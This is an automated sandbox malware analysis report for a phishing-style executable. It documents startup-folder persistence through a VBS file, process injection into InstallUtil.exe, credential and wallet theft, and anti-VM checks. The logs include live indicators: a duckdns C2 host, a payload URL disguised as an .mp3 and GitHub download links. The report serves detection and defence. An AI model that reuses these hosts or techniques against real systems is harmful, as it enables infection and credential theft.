Edit tour

Windows Analysis Report
RFQ-12202431_ACD_Group.pif.exe

Overview

General Information

Sample name:	RFQ-12202431_ACD_Group.pif.exe
Analysis ID:	1583542
MD5:	07a7551da7299874afd2c3e299eca83a
SHA1:	250884b7f1c7b152ca82f663d2e91986cec83db5
SHA256:	579054d208bdfde13c82c6c998e981f0559f69908a1ebc34249c2657a5d1c59d
Tags:	exeuser-threatcat_ch
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

.NET source code contains very large array initializations

AI detected suspicious sample

Drops VBS files to the startup folder

Found many strings related to Crypto-Wallets (likely being stolen)

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries memory information (via WMI often done to detect virtual machines)

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Sigma detected: WScript or CScript Dropper

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Bitcoin Wallet information

Uses dynamic DNS services

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Yara detected Costura Assembly Loader

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

RFQ-12202431_ACD_Group.pif.exe (PID: 7660 cmdline: "C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe" MD5: 07A7551DA7299874AFD2C3E299ECA83A)

InstallUtil.exe (PID: 7856 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

wscript.exe (PID: 8088 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

Count.exe (PID: 8136 cmdline: "C:\Users\user\AppData\Roaming\Count.exe" MD5: 07A7551DA7299874AFD2C3E299ECA83A)

InstallUtil.exe (PID: 1460 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1794630967.0000000006980000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.1781499466.0000000002C5C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000004.00000002.2038135450.0000000003CA7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000004.00000002.2029060022.00000000025BD000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000007.00000002.2183283831.0000000002901000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.4119055233.000000000284F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1787752415.0000000003C18000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: RFQ-12202431_ACD_Group.pif.exe PID: 7660	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: RFQ-12202431_ACD_Group.pif.exe PID: 7660	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: InstallUtil.exe PID: 7856	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Count.exe PID: 8136	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Count.exe PID: 8136	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: InstallUtil.exe PID: 1460	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 8 entries

Unpacked PEs

Source	Rule	Description	Author
4.2.Count.exe.3ca7428.8.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.RFQ-12202431_ACD_Group.pif.exe.6980000.10.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.RFQ-12202431_ACD_Group.pif.exe.40ea5e8.1.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.RFQ-12202431_ACD_Group.pif.exe.3fb61c8.3.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.RFQ-12202431_ACD_Group.pif.exe.3e81da0.0.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security

Sigma Signatures

System Summary

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbs" , ProcessId: 8088, ProcessName: wscript.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbs" , ProcessId: 8088, ProcessName: wscript.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe, ProcessId: 7660, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Count.vbs

Suricata Signatures

ET MALWARE Generic AsyncRAT Style SSL Cert

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-03T01:50:15.163815+0100	2035595	1	Domain Observed Used for C2 Detected	193.187.91.218	50787	192.168.2.4	49736	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: RFQ-12202431_ACD_Group.pif.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\Count.exe

Avira: detection malicious, Label: HEUR/AGEN.1308638

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\Count.exe

ReversingLabs: Detection: 26%

Multi AV Scanner detection for submitted file

Source: RFQ-12202431_ACD_Group.pif.exe	Virustotal: Detection: 29%			Perma Link
Source: RFQ-12202431_ACD_Group.pif.exe	ReversingLabs: Detection: 26%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\Count.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: RFQ-12202431_ACD_Group.pif.exe

Joe Sandbox ML: detected

Source: RFQ-12202431_ACD_Group.pif.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

Jump to behavior

Source: unknown	HTTPS traffic detected: 209.58.149.225:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 209.58.149.225:443 -> 192.168.2.4:49738 version: TLS 1.2

Source: RFQ-12202431_ACD_Group.pif.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.1787752415.000000000478E000.00000004.00000800.00020000.00000000.sdmp, RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.1795094408.0000000006A60000.00000004.08000000.00040000.00000000.sdmp, RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.1787752415.0000000004617000.00000004.00000800.00020000.00000000.sdmp, Count.exe, 00000004.00000002.2038135450.000000000413C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.1787752415.000000000478E000.00000004.00000800.00020000.00000000.sdmp, RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.1795094408.0000000006A60000.00000004.08000000.00040000.00000000.sdmp, RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.1787752415.0000000004617000.00000004.00000800.00020000.00000000.sdmp, Count.exe, 00000004.00000002.2038135450.000000000413C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.1794356759.00000000068A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.1794356759.00000000068A0000.00000004.08000000.00040000.00000000.sdmp

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 4x nop then jmp 06A5EBE2h	0_2_06A5EBEB
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 4x nop then jmp 06A5EBE2h	0_2_06A5EED1
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 4x nop then jmp 06A57FF7h	0_2_06A57C09
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 4x nop then jmp 06A57FF7h	0_2_06A57C18
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4x nop then jmp 0633EBE2h	4_2_0633EBEB
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4x nop then jmp 0633EBE2h	4_2_0633EED1
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4x nop then jmp 06337FF7h	4_2_06337C18
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4x nop then jmp 06337FF7h	4_2_06337C09

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 193.187.91.218:50787 -> 192.168.2.4:49736

Uses dynamic DNS services

Source: unknown

DNS query: name: pureeratee.duckdns.org

Source: global traffic

TCP traffic: 192.168.2.4:49736 -> 193.187.91.218:50787

Source: Joe Sandbox View

ASN Name: OBE-EUROPEObenetworkEuropeSE OBE-EUROPEObenetworkEuropeSE

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: global traffic	HTTP traffic detected: GET /wp-panel/uploads/Wlvdlivs.mp3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.chirreeirl.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-panel/uploads/Wlvdlivs.mp3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.chirreeirl.comConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /wp-panel/uploads/Wlvdlivs.mp3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.chirreeirl.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /wp-panel/uploads/Wlvdlivs.mp3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: www.chirreeirl.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: www.chirreeirl.com
Source: global traffic	DNS traffic detected: DNS query: pureeratee.duckdns.org

Source: InstallUtil.exe, 00000001.00000002.4116947520.0000000000D11000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: InstallUtil.exe, 00000001.00000002.4127501251.0000000005180000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabG
Source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.1781499466.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4119055233.000000000284F000.00000004.00000800.00020000.00000000.sdmp, Count.exe, 00000004.00000002.2029060022.0000000002571000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: InstallUtil.exe, 00000001.00000002.4119055233.000000000284F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2183283831.0000000002901000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/WebDriver.dll
Source: InstallUtil.exe, 00000001.00000002.4119055233.000000000284F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2183283831.0000000002901000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/chromedriver.exe
Source: InstallUtil.exe, 00000001.00000002.4119055233.000000000284F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2183283831.0000000002901000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/msedgedriver.exe
Source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.1794356759.00000000068A0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.1794356759.00000000068A0000.00000004.08000000.00040000.00000000.sdmp, Count.exe, 00000004.00000002.2038135450.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.1794356759.00000000068A0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.1794356759.00000000068A0000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4119055233.000000000284F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2183283831.0000000002901000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.1781499466.0000000002C5C000.00000004.00000800.00020000.00000000.sdmp, RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.1794356759.00000000068A0000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000001.00000002.4119055233.000000000284F000.00000004.00000800.00020000.00000000.sdmp, Count.exe, 00000004.00000002.2029060022.00000000025BD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2183283831.0000000002901000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.1794356759.00000000068A0000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: InstallUtil.exe, 00000001.00000002.4119055233.000000000284F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.2183283831.0000000002901000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354rCannot
Source: RFQ-12202431_ACD_Group.pif.exe, 00000000.00000002.1781499466.0000000002C11000.00000004.00000800.00020000.00000000.sdmp, Count.exe, 00000004.00000002.2029060022.0000000002571000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.chirreeirl.com
Source: RFQ-12202431_ACD_Group.pif.exe, Count.exe.0.dr	String found in binary or memory: https://www.chirreeirl.com/wp-panel/uploads/Wlvdlivs.mp3

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443

Source: unknown	HTTPS traffic detected: 209.58.149.225:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 209.58.149.225:443 -> 192.168.2.4:49738 version: TLS 1.2

System Summary

.NET source code contains very large array initializations

Source: 0.2.RFQ-12202431_ACD_Group.pif.exe.4949c40.7.raw.unpack, Oou6f20t2x6LiBYUPV.cs

Large array initialization: QBntoY4j5: array initializer size 304912

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: RFQ-12202431_ACD_Group.pif.exe

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06B06B00 NtResumeThread,	0_2_06B06B00
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06B03898 NtProtectVirtualMemory,	0_2_06B03898
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06B06AFB NtResumeThread,	0_2_06B06AFB
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06B03890 NtProtectVirtualMemory,	0_2_06B03890
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_06310990 NtProtectVirtualMemory,	4_2_06310990
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_063137F8 NtResumeThread,	4_2_063137F8
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_06310989 NtProtectVirtualMemory,	4_2_06310989
Source: C:\Users\user\AppData\Roaming\Count.exe	Code function: 4_2_063137F0 NtResumeThread,	4_2_063137F0

Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_02AC28B8	0_2_02AC28B8
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_02AC2897	0_2_02AC2897
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_02AC2E42	0_2_02AC2E42
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06817468	0_2_06817468
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06818DDB	0_2_06818DDB
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_068150A8	0_2_068150A8
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_068116E9	0_2_068116E9
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_068116F8	0_2_068116F8
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06817479	0_2_06817479
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_0681D380	0_2_0681D380
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_0681D390	0_2_0681D390
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06815098	0_2_06815098
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_068F4610	0_2_068F4610
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_068F0040	0_2_068F0040
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_068F7F90	0_2_068F7F90
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_068F10E0	0_2_068F10E0
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_068F10F0	0_2_068F10F0
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_068F0007	0_2_068F0007
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_068F5C28	0_2_068F5C28
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_068F4947	0_2_068F4947
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06907350	0_2_06907350
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06907340	0_2_06907340
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06906090	0_2_06906090
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_069060A0	0_2_069060A0
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06900027	0_2_06900027
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06900040	0_2_06900040
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06907841	0_2_06907841
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06A59F28	0_2_06A59F28
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06A5EED1	0_2_06A5EED1
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06A54558	0_2_06A54558
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06A5C3A0	0_2_06A5C3A0
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06A5C3B0	0_2_06A5C3B0
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06A5E3EA	0_2_06A5E3EA
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06B00040	0_2_06B00040
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06B00EF7	0_2_06B00EF7
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06B07A3C	0_2_06B07A3C
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06B00F08	0_2_06B00F08
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06B00013	0_2_06B00013
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06B075B0	0_2_06B075B0
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06B075A0	0_2_06B075A0
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06D2EEC8	0_2_06D2EEC8
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06D10040	0_2_06D10040
Source: C:\Users\user\Desktop\RFQ-12202431_ACD_Group.pif.exe	Code function: 0_2_06D10007	0_2_06D10007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_00F41D28	1_2_00F41D28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_00F42158	1_2_00F42158
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_00F42148	1_2_00F42148
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_00F4433A	1_2_00F4433A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_00F427DE	1_2_00F427DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_00F427C1	1_2_00F427C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_00F447B1	1_2_00F447B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_00F427A7	1_2_00F427A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_00F42793	1_2_00F42793
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_00F42779	1_2_00F42779
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_00F42766	1_2_00F42766
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_00F42720	1_2_00F42720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_00F42720	1_2_00F42720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_00F42829	1_2_00F42829
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 1_2_00F42803	1_2_00F42803
